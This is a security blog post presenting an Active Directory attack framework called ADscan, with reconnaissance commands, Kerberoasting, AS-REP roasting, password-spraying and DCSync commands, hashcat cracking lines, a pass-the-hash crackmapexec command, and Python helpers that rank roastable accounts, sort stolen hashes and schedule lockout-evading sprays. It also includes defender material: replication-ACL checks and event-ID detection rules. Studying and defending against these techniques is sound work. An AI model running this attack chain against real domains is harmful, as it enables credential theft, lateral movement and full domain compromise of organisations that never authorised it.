
Introduction
Active Directory (AD) remains the most targeted authentication service in enterprise environments, with the large majority of Fortune 500 companies relying on it, and attackers know that every Kerberoastable service account with a weak password, and every over-granted replication right that permits DCSync, is a path to the whole domain. ADscan is presented as a unified CLI framework that sits between SharpHound's enumeration depth and CrackMapExec's execution flexibility, automating a full-cycle AD security assessment from unauthenticated reconnaissance to MITRE ATT&CK-mapped reporting and cutting hours from manual pentesting workflows.
Learning Objectives
- Perform comprehensive AD reconnaissance using DNS, LDAP, SMB, Kerberos, and ADCS without switching tools.
- Execute Kerberoasting, AS‑REP roasting, password spraying, GPP attacks, and DCSync from a single CLI interface.
- Generate penetration test reports automatically mapped to MITRE ATT&CK tactics (TA0006, T1558, etc.) in TXT/JSON.
You Should Know
1. Installing ADscan and Setting Up Your Attack Lab
ADscan is designed for Kali Linux and compatible with any Debian-based distribution. It requires Python 3.9+, Impacket, and BloodHound dependencies for data export.
Step‑by‑step installation guide:
# Clone the repository (placeholder URL from the original post; replace it with the real repository if one is published)
git clone https://github.com/example/ADscan.git
cd ADscan
# Install required Python packages
pip3 install -r requirements.txt
# Install system dependencies for Kerberos, SMB and LDAP
sudo apt update && sudo apt install -y krb5-user smbclient ldap-utils
# Verify installation
python3 adscan.py --help
Example output on successful install:
ADscan v1.0 - Active Directory Security Assessment Framework
Usage: adscan.py [OPTIONS] COMMAND
Commands:
  recon    Perform AD enumeration (DNS, LDAP, SMB, Kerberos)
  attack   Execute exploitation modules (kerberoast, asreproast, spray, dcsync)
  report   Generate MITRE ATT&CK mapped report
For Windows penetration testers, ADscan runs under WSL2 or a dedicated Linux VM; there is no native Windows binary. A Kali WSL instance works as long as it has network reachability to the domain controllers (DNS 53, Kerberos 88, LDAP 389/636 and SMB 445).
2. Unauthenticated AD Reconnaissance – Scanning Without Credentials
Before obtaining any domain credentials, ADscan can extract critical information from exposed LDAP, DNS, and SMB services. This mimics an external attacker or a rogue insider on a guest network.
Command for unauthenticated enumeration:
python3 adscan.py recon --dc-ip 192.168.1.10 --domain corp.local --no-auth
What this does:
- Performs DNS zone transfer attempts against the domain controller.
- Enumerates LDAP rootDSE to retrieve domain naming contexts.
- Lists SMB shares anonymously (null session if legacy configurations exist).
- Identifies Kerberos policy details (ticket lifetime, supported encryption types).
- Exports data to `./bloodhound_export/` for later ingestion into BloodHound.
Example snippet of TXT output:
[+] DNS SRV records for _ldap._tcp.corp.local: 192.168.1.10, 192.168.1.11
[+] LDAP rootDSE: defaultNamingContext=DC=corp,DC=local
[+] SMB anonymous share: IPC$ (accessible), NETLOGON (accessible)
[+] Kerberos encryption types supported: AES256-CTS-HMAC-SHA1-96
Pro tip: Save the JSON output (--output json) for scripted analysis, and import the ZIP written to `./bloodhound_export/` into BloodHound for visual attack path mapping. (`bloodhound-python` is an alternative collector, not an analysis tool; it produces the same kind of ingest files.)
3. Authenticated Reconnaissance and Attack Chain Automation
Once you have valid domain credentials (e.g., from a phishing campaign or a compromised low-privilege account), ADscan switches to authenticated mode to discover privilege escalation paths.
Command for authenticated full enumeration:
python3 adscan.py recon --dc-ip 192.168.1.10 --domain corp.local --username john.doe --password 'P@ssw0rd' --export-bloodhound
Step‑by‑step actions:
- LDAP query – Retrieves all users, groups, computers, and organizational units.
- SMB session – Enumerates shares and searches SYSVOL for Group Policy Preferences XML files that still carry a cpassword value (decryptable with the AES key Microsoft published; creation of new ones was stopped by MS14-025).
- SPN discovery – Lists user accounts with Service Principal Names (SPNs), the Kerberoasting targets.
- ADCS discovery – Detects Active Directory Certificate Services misconfigurations (ESC1–ESC8).
- BloodHound data generation – Outputs ZIP file ready for BloodHound visualization.
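To make the triage concrete, here is an added example (my code, not ADscan's or BloodHound's) that applies the checks an authenticated LDAP sweep has to make before roasting anything: which user objects carry an SPN, which have Kerberos pre-authentication disabled, and which to crack first. The directory entries, account names and encryption-type values are constructed for the example; the userAccountControl and msDS-SupportedEncryptionTypes bit values are the real ones.

```python
"""Triage LDAP user objects into roasting candidates.

Added example, not ADscan or BloodHound code. The entries below are
constructed to look like the attributes an LDAP search for
(objectClass=user) returns; no real accounts are referenced.
"""
from __future__ import annotations

# userAccountControl bits (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x0002
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000   # member computers
UF_SERVER_TRUST_ACCOUNT = 0x2000        # domain controllers
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000      # AS-REP roastable

# msDS-SupportedEncryptionTypes bits
ETYPE_RC4_HMAC = 0x4
ETYPE_AES = 0x8 | 0x10                  # AES128 | AES256

# Constructed sample directory entries (not real accounts)
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"], "adminCount": 1},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200,
     "servicePrincipalName": ["backup/bk01.corp.local"],
     "msDS-SupportedEncryptionTypes": 0x18},          # AES only
    {"sAMAccountName": "svc_old", "userAccountControl": 0x10202,   # disabled
     "servicePrincipalName": ["HTTP/old.corp.local"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000,
     "servicePrincipalName": ["HOST/ws01.corp.local"]},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000,
     "servicePrincipalName": ["ldap/dc01.corp.local"]},
    {"sAMAccountName": "j.legacy", "userAccountControl": 0x400200},  # no pre-auth
    {"sAMAccountName": "a.smith", "userAccountControl": 0x200},
]


def is_computer(entry: dict) -> bool:
    uac = entry.get("userAccountControl", 0)
    return bool(uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT)) \
        or entry["sAMAccountName"].endswith("$")


def is_enabled(entry: dict) -> bool:
    return not entry.get("userAccountControl", 0) & UF_ACCOUNTDISABLE


def rc4_allowed(entry: dict) -> bool:
    """RC4 (etype 23) tickets are possible when the attribute is absent/0 or has
    the RC4 bit. AES-only accounts yield AES tickets (hashcat 19600/19700),
    which are far slower to crack."""
    enc = entry.get("msDS-SupportedEncryptionTypes") or 0
    return enc == 0 or bool(enc & ETYPE_RC4_HMAC)


def is_kerberoastable(entry: dict) -> bool:
    """Enabled user (not computer) account with an SPN. krbtgt is skipped:
    it is disabled and its key is random, so its ticket is not crackable."""
    return (bool(entry.get("servicePrincipalName"))
            and is_enabled(entry)
            and not is_computer(entry)
            and entry["sAMAccountName"].lower() != "krbtgt")


def is_asrep_roastable(entry: dict) -> bool:
    uac = entry.get("userAccountControl", 0)
    return is_enabled(entry) and bool(uac & UF_DONT_REQUIRE_PREAUTH)


def kerberoast_priority(entry: dict) -> int:
    """Higher = crack first: privileged (adminCount), RC4 ticket, static password."""
    score = 0
    if entry.get("adminCount") == 1:
        score += 3
    if rc4_allowed(entry):
        score += 2
    if entry.get("userAccountControl", 0) & UF_DONT_EXPIRE_PASSWD:
        score += 1
    return score


def triage(entries: list[dict]) -> dict[str, list[str]]:
    roast = sorted((e for e in entries if is_kerberoastable(e)),
                   key=kerberoast_priority, reverse=True)
    return {
        "kerberoast": [e["sAMAccountName"] for e in roast],
        "asrep": [e["sAMAccountName"] for e in entries if is_asrep_roastable(e)],
    }


if __name__ == "__main__":
    for kind, names in triage(SAMPLE_ENTRIES).items():
        print(f"{kind}: {', '.join(names)}")
```

The computer accounts, the disabled service account and krbtgt all drop out, and the AES-only account is ranked after the RC4-capable privileged one, which is the order a cracking rig should see them in.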
Windows alternative using native tools (for reference):
# Equivalent manual SPN enumeration in PowerShell (ADscan automates this); krbtgt is excluded because its key is not crackable
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName | Where-Object { $_.SamAccountName -ne 'krbtgt' } | Select-Object SamAccountName, ServicePrincipalName
4. Executing Kerberoasting and AS‑REP Roasting Attacks
ADscan’s `attack` module streamlines two of the most effective offline password cracking techniques.
Kerberoasting – Crack service account hashes:
python3 adscan.py attack kerberoast --dc-ip 192.168.1.10 --domain corp.local --username john.doe --password 'P@ssw0rd' --output hashes.kerberoast
What it does: Requests a Ticket Granting Service (TGS) ticket for each user SPN, extracts the encrypted part of the service ticket (RC4-HMAC if the account permits it, otherwise AES128/AES256) and saves it in Hashcat format ($krb5tgs$23$..., $krb5tgs$17$... or $krb5tgs$18$...). The encryption type matters: RC4 tickets crack orders of magnitude faster than AES ones.
AS‑REP Roasting – Target users with Kerberos pre‑authentication disabled (needs only a candidate user list, no valid credentials, because the KDC returns the AS-REP for such a user to anyone who asks):
python3 adscan.py attack asreproast --dc-ip 192.168.1.10 --domain corp.local --username list.txt --password '' --output hashes.asrep
Cracking the hashes (Linux):
# Kerberoast, RC4 tickets ($krb5tgs$23$...); use -m 19600 / -m 19700 for AES128 / AES256 tickets ($krb5tgs$17$ / $krb5tgs$18$)
hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt
# AS-REP roast, RC4 ($krb5asrep$23$...)
hashcat -m 18200 hashes.asrep /usr/share/wordlists/rockyou.txt
If successful, you obtain plaintext service account passwords; because service accounts are frequently over-privileged and rarely rotated, this is one of the most common routes to Domain Admin.
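The mode numbers above depend on the ticket's encryption type, and hashcat will not accept a file mixing formats. The following added example (my code, not ADscan's or Impacket's) reads the prefixes of the $krb5tgs$ / $krb5asrep$ lines that Impacket-style tools emit, picks the matching hashcat mode, pulls the account and SPN out of the RC4 variants, and builds one hashcat command per mode. The hash lines are constructed with shortened ciphertext and are not real ticket material.

```python
"""Sort roasted Kerberos hashes into the right hashcat mode.

Added example, not ADscan or Impacket code. The sample lines are constructed
in the formats GetUserSPNs.py / GetNPUsers.py produce, with the ciphertext
shortened to keep them readable.
"""
from __future__ import annotations
import re
from pathlib import Path

# (hash family, Kerberos etype) -> hashcat -m value
HASHCAT_MODES = {
    ("krb5tgs", 23): 13100,    # Kerberoast, RC4-HMAC
    ("krb5tgs", 17): 19600,    # Kerberoast, AES128-CTS-HMAC-SHA1-96
    ("krb5tgs", 18): 19700,    # Kerberoast, AES256-CTS-HMAC-SHA1-96
    ("krb5asrep", 23): 18200,  # AS-REP roast, RC4-HMAC
    ("krb5asrep", 17): 32100,  # AS-REP roast, AES128 (hashcat >= 6.2.6)
    ("krb5asrep", 18): 32200,  # AS-REP roast, AES256 (hashcat >= 6.2.6)
}

_PREFIX = re.compile(r"^\$(krb5tgs|krb5asrep)\$(\d+)\$")
# RC4 TGS-REP: $krb5tgs$23$*user$REALM$spn*$checksum$edata
_TGS_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")
# RC4 AS-REP: $krb5asrep$23$user@REALM:checksum$edata
_ASREP_RC4 = re.compile(
    r"^\$krb5asrep\$23\$([^@]+)@([^:]+):([0-9a-f]{32})\$([0-9a-f]+)$")

# Constructed sample dump (truncated hex, not real ticket material)
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$corp.local/svc_sql*$" + "a1" * 16 + "$" + "b2" * 24,
    "$krb5tgs$18$svc_backup$CORP.LOCAL$*backup/bk01.corp.local*$" + "c3" * 12 + "$" + "d4" * 24,
    "$krb5asrep$23$j.legacy@CORP.LOCAL:" + "e5" * 16 + "$" + "f6" * 24,
    "not-a-kerberos-hash",
]


def hashcat_mode(line: str) -> int | None:
    """Return the -m value for a hash line, or None if the format is unknown."""
    m = _PREFIX.match(line.strip())
    if not m:
        return None
    return HASHCAT_MODES.get((m.group(1), int(m.group(2))))


def parse_rc4(line: str) -> dict | None:
    """Account/realm/SPN from the RC4 formats (the ones worth cracking first)."""
    m = _TGS_RC4.match(line.strip())
    if m:
        return {"kind": "tgs", "user": m.group(1), "realm": m.group(2), "spn": m.group(3)}
    m = _ASREP_RC4.match(line.strip())
    if m:
        return {"kind": "asrep", "user": m.group(1), "realm": m.group(2), "spn": None}
    return None


def split_by_mode(lines: list[str]) -> dict[int, list[str]]:
    """Group hashes by mode; hashcat refuses mixed formats in one input file."""
    out: dict[int, list[str]] = {}
    for line in lines:
        mode = hashcat_mode(line)
        if mode is not None:
            out.setdefault(mode, []).append(line.strip())
    return out


def hashcat_commands(lines: list[str], prefix: str = "hashes",
                     wordlist: str = "/usr/share/wordlists/rockyou.txt") -> list[str]:
    """One hashcat invocation per mode. Numeric order happens to put the
    RC4 modes (13100, 18200) before the AES ones, i.e. cheapest first."""
    return [f"hashcat -m {mode} {prefix}.{mode} {wordlist}"
            for mode in sorted(split_by_mode(lines))]


def write_split(lines: list[str], prefix: str = "hashes") -> list[Path]:
    """Write one file per mode, named to match hashcat_commands()."""
    paths = []
    for mode, group in split_by_mode(lines).items():
        p = Path(f"{prefix}.{mode}")
        p.write_text("\n".join(group) + "\n")
        paths.append(p)
    return paths


if __name__ == "__main__":
    for line in SAMPLE_HASHES:
        print(hashcat_mode(line), parse_rc4(line))
    print("\n".join(hashcat_commands(SAMPLE_HASHES)))
```

Run it against the real dump files produced by the attack module; lines the prefix regex does not recognise are dropped rather than passed to hashcat, where they would abort the whole job.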
5. Password Spraying and DCSync – Lateral Movement & Golden Ticket
ADscan automates low-and-slow password spraying to avoid account lockouts, followed by DCSync to simulate a domain controller replication attack.
Password spray command:
python3 adscan.py attack spray --dc-ip 192.168.1.10 --domain corp.local --userlist users.txt --password 'Spring2025!' --delay 30 --lockout-threshold 5
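What --delay and --lockout-threshold are protecting against is arithmetic a tester should do explicitly before the first guess. This added example (my code, not ADscan's) converts the lockOutObservationWindow value as stored in LDAP into minutes, works out how many guesses per user fit inside one window while leaving a margin for the user's own typos, and schedules batches so that each batch ends a full window before the next begins. The user list, password list and policy values are constructed; threshold 5 matches the --lockout-threshold 5 in the command above.

```python
"""Lockout-aware password-spray scheduler.

Added example, not ADscan code. Policy values are constructed; in practice
read them from the domain (net accounts /domain, or the lockoutThreshold and
lockOutObservationWindow attributes on the domain naming context).
"""
from __future__ import annotations
from dataclasses import dataclass


def observation_window_minutes(ldap_value: int) -> float:
    """lockOutObservationWindow is stored as a negative count of 100-ns
    intervals: -18000000000 -> 30 minutes."""
    return -ldap_value / 10_000_000 / 60


@dataclass
class Batch:
    start_min: float        # minutes after the spray begins
    passwords: list[str]
    users: int
    delay_s: int

    @property
    def attempts(self) -> int:
        return len(self.passwords) * self.users

    @property
    def duration_min(self) -> float:
        return self.attempts * self.delay_s / 60


def guesses_per_window(threshold: int, margin: int = 1) -> int | None:
    """Guesses per user that fit in one window. None means no lockout policy."""
    if threshold == 0:
        return None
    allowed = threshold - 1 - margin    # leave room for the user's own typos
    if allowed < 1:
        raise ValueError(f"threshold {threshold} leaves no safe budget with margin {margin}")
    return allowed


def plan_spray(users: list[str], passwords: list[str], threshold: int,
               window_min: float, delay_s: int = 30, margin: int = 1) -> list[Batch]:
    """Split the password list into batches a user can absorb without lockout.

    badPwdCount is reset only once window_min has passed since the user's LAST
    bad attempt, so each batch must finish, then wait the full window, before
    the next one starts. Attempts inside a batch are spaced delay_s apart.
    """
    if not passwords:
        return []
    per_window = guesses_per_window(threshold, margin)
    chunk = per_window or len(passwords)
    batches: list[Batch] = []
    start = 0.0
    for i in range(0, len(passwords), chunk):
        b = Batch(start, passwords[i:i + chunk], len(users), delay_s)
        batches.append(b)
        start = b.start_min + b.duration_min + (window_min if per_window else 0)
    return batches


def total_runtime_min(batches: list[Batch]) -> float:
    last = batches[-1]
    return last.start_min + last.duration_min


if __name__ == "__main__":
    # Constructed policy: threshold 5, 30-minute window (LDAP raw value -18000000000)
    window = observation_window_minutes(-18_000_000_000)
    users = [f"user{i:02d}" for i in range(10)]
    pws = ["Spring2025!", "Summer2025!", "Corp2025!", "Welcome1!",
           "Password1", "P@ssw0rd", "Winter2024!"]
    plan = plan_spray(users, pws, threshold=5, window_min=window)
    for b in plan:
        print(f"t+{b.start_min:5.1f} min: {b.attempts:3d} attempts, {b.passwords}")
    print(f"total runtime: {total_runtime_min(plan):.0f} min")
```

Note that badPwdCount is tracked per domain controller and is not replicated, so spraying against a single DC keeps the accounting simple; spreading requests across DCs does not raise the per-DC count but the PDC emulator still learns of every failure.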
DCSync attack (requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain naming context, which Domain Admins hold through BUILTIN\Administrators and which attackers hunt for on accounts that were granted them by mistake):
python3 adscan.py attack dcsync --dc-ip 192.168.1.10 --domain corp.local --username administrator --hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --output dcsync_hashes.ntds
How DCSync works: ADscan reuses the DRSUAPI code path of Impacket's `secretsdump.py`, issuing the same IDL_DRSGetNCChanges replication request that Mimikatz `lsadump::dcsync` sends, so the domain controller itself hands over the password hashes of any requested account, KRBTGT included, over the replication protocol; nothing touches NTDS.dit on disk. The KRBTGT hash is what a Golden Ticket is forged from. The hash in the example command is the NT hash of an empty password, i.e. a placeholder, not a credential from the lab.
Mitigation checks for defenders (Windows):
# List the ACEs on the domain head that grant a replication extended right; by default only BUILTIN\Administrators, Domain Controllers, Enterprise Domain Controllers and (for Get-Changes only) Enterprise Read-only Domain Controllers should appear
dsacls "DC=corp,DC=local" | findstr /i "Replicating"
# Exchange Windows Permissions historically held WriteDACL on the domain object and could grant itself replication rights; review its membership
net group "Exchange Windows Permissions" /domain
# Remove the ACEs held by an unexpected principal (placeholder trustee shown; review first, /R strips every ACE of that trustee on the object, not just the replication right)
dsacls "DC=corp,DC=local" /R "CORP\svc_backup"
6. Automated Report Generation with MITRE ATT&CK Mapping
After completing the attack chain, ADscan produces a structured report that aligns each finding with MITRE ATT&CK tactics and techniques, reducing manual report writing time significantly.
Generate report:
python3 adscan.py report --input adscan_results.json --format json,html --mitre
Example report excerpt (JSON):
{
"technique": "T1558.003 - Kerberoasting",
"tactic": "Credential Access (TA0006)",
"affected_assets": ["[email protected]", "[email protected]"],
"remediation": "Use Managed Service Accounts (MSAs) or group Managed Service Accounts (gMSAs); set long complex passwords; limit SPN assignment"
}
For security teams, the JSON output lets scheduled ADscan runs feed recurring control checks (for example the access-control evidence PCI-DSS and HIPAA audits ask for) from a pipeline job, provided the runs are scoped to a lab or an explicitly authorised domain.
7. Comparison with SharpHound and CrackMapExec – When to Use ADscan
While ADscan combines enumeration and exploitation, SharpHound excels at BloodHound data collection, and CrackMapExec offers broader protocol coverage (WinRM, SSH, MSSQL). ADscan is ideal for red teams who want a single tool for quick AD assessments without managing multiple scripts.
Example hybrid workflow:
# Use ADscan for initial recon and attack
python3 adscan.py recon --authenticated --dc-ip 10.0.0.1 --export-bloodhound
# Then import ./bloodhound_export/2025-03-15_audit.zip into BloodHound (running separately) through its Upload Data dialog
# For post-exploitation lateral movement, use CrackMapExec with the credentials found (--exec-method only takes effect together with a command to run)
crackmapexec smb 10.0.0.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' --exec-method smbexec -x whoami
Detecting ADscan-like activity (defender side):
The evidence is on the domain controllers, not on Linux hosts. Enable Directory Service Access auditing (event 4662 carrying a DS-Replication-Get-Changes GUID from a principal that is not a domain controller flags DCSync), Kerberos Service Ticket Operations auditing (event 4769 with encryption type 0x17, RC4, for a user SPN flags Kerberoasting), Kerberos Authentication Service auditing (event 4768 with Pre-Authentication Type 0 flags AS-REP roasting) and watch 4771 pre-auth failures with status 0x18 across many accounts from one source for spraying. Sysmon or auditd on an endpoint only see the tool process itself; on a Linux jump host they can at most record that the tool was run:
# Record executions under the directory ADscan was cloned into (adjust the path) and replay them
sudo auditctl -w "$PWD/ADscan" -p x -k ad_tools
sudo ausearch -k ad_tools
# If the tool logs to the journal, grep its module names (the alternation needs -E)
sudo journalctl -f | grep -Ei "kerberoast|asrep|dcsync"
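As an added example (my code, not ADscan's and not any vendor's rule set), here is the detection side of the chain run over constructed DC Security events normalised the way a SIEM would present them: DCSync (4662 with a replication GUID from a non-DC principal), Kerberoasting (4769, RC4 ticket for a user SPN), AS-REP roasting (4768 with pre-authentication type 0) and spraying (4771 status 0x18 for many accounts from one source). The event values, names and IPs are constructed; the event IDs, status codes and the three DS-Replication GUIDs are the real ones.

```python
"""Detection rules for the attack chain above, run over constructed DC events.

Added example, not ADscan code or a vendor rule. Each record imitates the
fields of a Windows Security event as a SIEM normalises them; the names,
IPs and values are constructed. The GUIDs are the real extended-right GUIDs.
"""
from __future__ import annotations
import re
from collections import defaultdict

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
_GUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample events (not from a real domain)
SAMPLE_EVENTS = [
    # DCSync by a user account; DC computer accounts (name ends in $) replicate legitimately
    {"EventID": 4662, "SubjectUserName": "svc_backup",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "IpAddress": "10.0.0.50"},
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "IpAddress": "10.0.0.11"},
    # Kerberoast: RC4 (0x17) service ticket for a user SPN; AES ticket for a host is normal
    {"EventID": 4769, "TargetUserName": "john.doe@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "john.doe@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.50"},
    # AS-REP roast: TGT issued without pre-authentication
    {"EventID": 4768, "TargetUserName": "j.legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    # Spray: one source, many accounts, bad password (0x18 = KDC_ERR_PREAUTH_FAILED)
    *[{"EventID": 4771, "TargetUserName": f"user{i:02d}", "Status": "0x18",
       "IpAddress": "10.0.0.50"} for i in range(12)],
    {"EventID": 4771, "TargetUserName": "a.smith", "Status": "0x18", "IpAddress": "10.0.0.77"},
]


def is_machine(name: str) -> bool:
    return name.endswith("$")


def alert(technique: str, rule: str, subject: str, source: str) -> dict:
    return {"technique": technique, "rule": rule, "subject": subject, "source": source}


def detect(events: list[dict], spray_threshold: int = 10) -> list[dict]:
    """Return ATT&CK-tagged alerts for the roasting / DCSync / spray patterns."""
    alerts: list[dict] = []
    failures: dict[str, set[str]] = defaultdict(set)   # source IP -> accounts
    for e in events:
        eid = e["EventID"]
        if eid == 4662:
            guids = {g.lower() for g in _GUID.findall(e.get("Properties", ""))}
            if guids & REPLICATION_RIGHTS and not is_machine(e["SubjectUserName"]):
                alerts.append(alert("T1003.006", "replication right used by non-DC principal",
                                    e["SubjectUserName"], e["IpAddress"]))
        elif eid == 4769:
            svc = e["ServiceName"]
            if (e.get("TicketEncryptionType", "").lower() == "0x17"
                    and not is_machine(svc) and svc.lower() != "krbtgt"):
                alerts.append(alert("T1558.003", "RC4 service ticket for user SPN",
                                    svc, e["IpAddress"]))
        elif eid == 4768 and e.get("PreAuthType") == "0":
            alerts.append(alert("T1558.004", "TGT issued without pre-authentication",
                                e["TargetUserName"], e["IpAddress"]))
        elif eid in (4771, 4625) and e.get("Status", "").lower() in ("0x18", "0xc000006a"):
            failures[e["IpAddress"]].add(e["TargetUserName"])
    for ip, accounts in failures.items():
        if len(accounts) >= spray_threshold:
            alerts.append(alert("T1110.003", f"{len(accounts)} accounts failed from one source",
                                ", ".join(sorted(accounts)), ip))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['technique']:10} {a['source']:12} {a['rule']}: {a['subject']}")
```

The Kerberoast rule is the noisy one in domains where RC4 is still negotiated routinely; in practice it is tuned by counting distinct user SPNs requested by one requester in a short window, exactly the pattern a bulk `attack kerberoast` run produces.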
What Undercode Say
- Unified automation reduces human error – ADscan’s ability to chain enumeration, attacks, and reporting in one CLI minimizes missed attack paths common when juggling separate tools like PowerView, Rubeus, and Impacket.
- MITRE mapping is a game‑changer for compliance – Automatic mapping to ATT&CK techniques (e.g., T1558.003, T1003.006) transforms raw pentest output into actionable risk assessments, saving hours of manual tabulation.
- But ecosystem maturity matters – The post rightly notes ADscan lags behind SharpHound’s BloodHound integration depth and CrackMapExec’s vast module library; red teams should treat it as a force‑multiplier, not a total replacement.
Prediction
As Microsoft continues to push Defender for Identity and Azure AD hardening, on‑premises Active Directory attacks will pivot further toward certificate misconfigurations (ADCS ESC attacks) and cloud‑hybrid Kerberos flaws. ADscan’s roadmap likely includes automated ADCS exploitation and Azure AD Connect dump modules—turning this framework into a de facto standard for purple team exercises within 12 months. Expect detection vendors to build ADscan‑specific SIGMA rules, forcing attackers to shift to more fragmented, custom tooling again. The arms race continues.
Reported By: Syed Muneeb – Hackers Feeds


